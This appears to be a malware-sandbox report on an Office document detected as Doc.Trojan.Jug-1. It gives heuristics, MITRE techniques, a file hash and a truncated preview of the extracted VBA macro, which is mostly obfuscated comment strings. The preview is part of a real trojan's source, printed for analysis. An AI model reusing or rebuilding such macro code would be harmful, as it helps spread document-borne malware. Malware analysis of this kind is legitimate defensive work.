MALICIOUS
160
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Jug-1. Static analysis revealed the presence of VBA macros, specifically a Document_Open and Workbook_Open macro, indicating a likely attempt to execute malicious code upon opening the document. The macros are heavily obfuscated, but their presence and the high severity heuristics suggest the primary function is to download and execute a secondary payload.
Heuristics 4
-
ClamAV: Doc.Trojan.Jug-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Jug-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 93055 bytes |
SHA-256: 402394a15732d3bfef2124069783871e548d8b133d3c051a53e5d158205e88b3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'|{cO~`x_b‚l"(E,,5l;%7uI%O;j|_^v]sz+Xk&S}fE
'|3c:`ziLPr;Udndjl3$\XfL`X`jpZ<~\tO
'|Ge.PO^LJ€]�g|lVs5sj|NEe>z@w=Ns+ZF`W:`HPQ
'|{`X}o#ub&]!](ub!l‚`€f{%Oz]xf^O$\HiuS}-wb[X;{^g<|
'|{5l;A#fmvLwd€gr5Y|z\k\zV.h!Tm{Y€e
'|
'Ck~`ol|uL(L.^[Xez^s>€_^=]Ta!XGvWszXf{h^€a#Z"O8^J7Mh :m=}[ncAQS\]em3QUlj
'Bg5/€j$e{gO�m"X{cO$l
'<_5.wj?f?~VsFx`^>lJ67w}5>v]#-Ge<.[+7Y,M ;e6Ni-t^j\C%R}LXLL(6_d%l
'F^'+‚l'ul[Sz]eTfzx.(
'>b�V.k]\ez8oe|-Ge<.<`4D(OtFY]J%TQN"_jmGd:
'|Ge8zNoLld:j=%HFdFYX)\BV3WL^fbubRE]Lcm: gbkkyKuQe6XfG$o|NF'9bQY`N"Ubi[APh/UF{iS|2TF'Bh*=_k
'8gylW^
'|GeM\V$Om€Sa@c=^gH‚\,k]rH
'8gylamy-Ge<.?q:d&Kri+VDqEQ@^IDjP
'|GeF[E]RkY< NsPFz?YMZgFoBQB~]M+KjpxQ\X8WC_c=vaw
'Ck~`ol|u?(Xql€bg5-€]xg^`O%‚@
'Bg5/€j$e{gO�m"X{cO$l
'|GeEZ`vbX&PjY)Ugg?U>vQM$,qX$:aqTs[vQ\(6 j
'7b‚lwL|`i5+�z`amzQsjCul`O%zXf{h^€a#Z
'fDzc.57w}
'|GeEm[t_XfSmFjDkbQ_bY@YgB$dr`U{XOQe<>^HXYg\AfL~KeSr_+i]c;fVA$KqAM�
'9h%lwL|`i5'.)7Gh53|l?},El8zia]>l9zM~35]Y].u65]Y].u$5-vj?<g't6)I%{BlD-@u#5<|\@u$5‚C!QuGzb‚z€G^‚Z
'6kzK‚]bXr5'.kbXr
'8gylTm#Vm~Y|
'|Ge7�Ek4[_O#Q�f```R:%><^Gcb CJrU[JZQq[
'Ck~`ol|u?(Xql€bg5PSp%blzNSf~\gzt�Lxe`z^Oh%u:&lal'\g|x.kbXr5+�zjgk~Xu$7\E~Xs;$hg'lOk7<g'Ou]'~
'Bg5/€j$e{gO�m"X{cO$l
'|GeFgH ^<s_jo
'7b‚l"Y'}+Eu.9(uL'\wf~�{zYz‚I#"5+�zjgk~Xu$7Uh!N6*G~{V].K)eb!Q:z%ehxIr]z_Z%O6*G~{V].K)eb!Q
'7b‚l�=#Zb!O?zXf{h^€a#Z%5]Sf~\gz~.9(uL'\wf~�{&/|_€a^HlOk7Fm%S|_
'EZ!N}e€m^
'|GeFY9_V]l2kYX=m(_c`XU
'fMzW~zTu}V,Q<\9@]3XCc@Gd:_JjGNkAfQqw
'9h%lwL|`i5'.)7Gh5~>2eCK5X€Wk?bYUXU'4Y*]WpyUT)2 Dl>ra9P@.
'ch-lKz`am=<|\7 {aO|‚(G^‚Z7!7€{F
'iZ%twL|`i>lKzd\]=]b]"c%5Z}rCu*>
'fMzW~zTuEzP‚‚(G^‚Z:z%bs5y.)@u$5<w_ g!&>se%�{aO|‚(G^‚Z7zDui"d72eCK5-wTZAe�8~^dX\~<!
'|Ge\f?.YJ^5fF&]A_-e^iX
'F^�Oql76Z&O.A#g!=€."7Egyu.#7$"
'|GeS`>{DgbU}f‚dZsX]o%Wc
'6Z&O.)Qu["Xr‚€G^‚Z7zTu}Ol0
'|GeG‚eyfAk
'Xh�twL|`i>lKz+UE{l4z+UE{l4z+UE{$\Hiuer0 AXiW'U€YnTiu
'|GeLw:|:o`+zqh:S_>lgy\_$@!Y"g]!6fm dh G�:j@M,U]^_En">~>lGp€+RE)gYr/nD*ik).}W_7Pm\$S,HX
'ck"Mm\|Vev\s‚€G^‚Z7zTu}7$\Hiu]'IxW([A'=RH.[Fb8R>,=AuTqdcSAoE‚gnj
'6Z&O.*Qu["Xr‚€G^‚Z7zTuow6t2eCK5cX@‚N:,/‚[}lidV{Hzh<
'Xh�twL|`i>lKz+UE{$\HiuA(3`D}Gb
'|GeOon#:N^Lp\}OieSnEzSk[G]V^DKcHta%TAz9~?~LeeQ^kY;ncFs=m\j'IyZwGJ]Iv[j^omLXI'4mk[fa^Spr
'ck"Mm\|Vev\s‚€G^‚Z7zTu}e\wnxg^5n
'|Ge+u^{<f)7`aeKghGsN*Vnd2}?{5]'G_N`J;bTtQzkl[Z!W+@K
'6Z&O.+Qu["Xr‚€G^‚Z7zTuow6tz=uow6t
'|GeDa@%lagRsQj>_XSt`+CS`0Zd^eR{`[De5ifa}l-Q[qZdo"8St_W:~7Oz6v>&YkuS€9oZZfImV]
'Xh�twL|`i>lKz+UE{l4z+UE{
'|Ge=%G^G@w;la}[Z)0aB_grgIY@[8;"J_[‚9lk,wlY=D,
'ck"Mm\|Vev\s‚€G^‚Z7zTu}e_pd€V{7
'|Ge0%>xCV|VW`+c_hYQc]WV*bxD_lQhDT:)^U
'6Z&O.,Qu["Xr‚€G^‚Z7zTu}Ol`]"u}5r.;'XZ'OY].u�5`pD}
'Xh�twL|`i>lKz+UE{l4z+UE{l4z+UE{
'ck"Mm\|Vev\s‚€G^‚Z7zTu}7
'8gyla]!X\'
'A^+^.akXf#
'|Ge+mgk^l\DUN`F`}BVfX_U(G#?uFks1l^jC=f7bBhRdbPXc�beV+PK
'\L#VwlehfwO€)70{F >2eCK5G$Dt_r,XX?(Se+JXO)PN,aVH]
'|Ge[X^!f^|M}afb`,/piaYb[UQN+9eh2sqgU=vDRA-FHcaO[ejD$LTX{6DwJW=z`j(;[Lj_;lbvgvGX‚Dg;dVm
'\L#VwlehfwO€)Xu653|l?Egyl8z€Fi�S‚F*`[z\?!QAIglVOrK;ZMuQt
'\L#VwlehfwO€)Yu65Sah!\mc_{Z|e*5y.ajce~^\m"U^%}O2eCK5Q^b{J<(X|H^bG‚EkJ
'\L#VwlehfwO€*70{H~
'|Ge9`EZaqsC#__WHhDRYlWke/[<*XK�:nm)iK c%JlM
'\L#VwlehfwO€*Xu653|l?Egyl8z€Fi�S‚F*`[z\@!
'|GeL_Y#Gdk6OQzgn$:}P'6K%+\?xdDWRSl'I^zU€?}SpkC}U%VZ"\ AoFk\TP?~L:_MmF\JlgWy
'\L#VwlehfwO€*Yu65Sah!\mc_{Z|e+5y.ajce~^\m"U^%~O
'\L#VwlehfwO€+70{~6wf|6h(X‚2eCK5O"LdR@tT"J&C@{GkCvfX
'\L#VwlehfwO€+Xu653|l?Egyl8z€Fi�S‚F*`[z\A!
'\L#VwlehfwO€+Yu65Sah!\mc_{Z|e,5y.ajce~^\m"U^% O
'fHwTs[)u65`oj?,"5r.|EI;e\}b|VmC@P;$`i"Xsf)f'^^se?w{;l"Y'}*Ku.€7w"C-}\|@hy_z]Ew
'\MzW~zTuB!^6J#W{?lZ]#}ldLx]zg">l9zH
'ch-lKz`aL'\6akXf#x.kfUczM‚$7w'7u
'fH!O.57?^{^6kfUczM‚$7ch-l;zH~
'fM*Y.57Eb|R‚‚(B[ OqlCuEzX6kfUczM‚!7‚{#Y&zBu*>
'fL#VwlfUczM‚)Xu65n�])u}5r.nxe!F|7z=u}5'.|7{{&9|]QAIglhb‚Oa�N[Y\7:[_dbiUhkO$_+
'fL#VwlfUczM‚)Yu65`oj?$)>l4z(Gp"
'fHwTs[)u65nd:geh OqlEI;XY{h$a^!^�&`g^‚t?!E6hyO[g{hezz02eCK5-‚HdIPtEwJhjLy5%E]Q?,Xp
'\MzW~zTuB!^6J#W{?lZ]#}ldLx]zg">l9zH
'ch-lKz`aL'\6akXf#x.
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.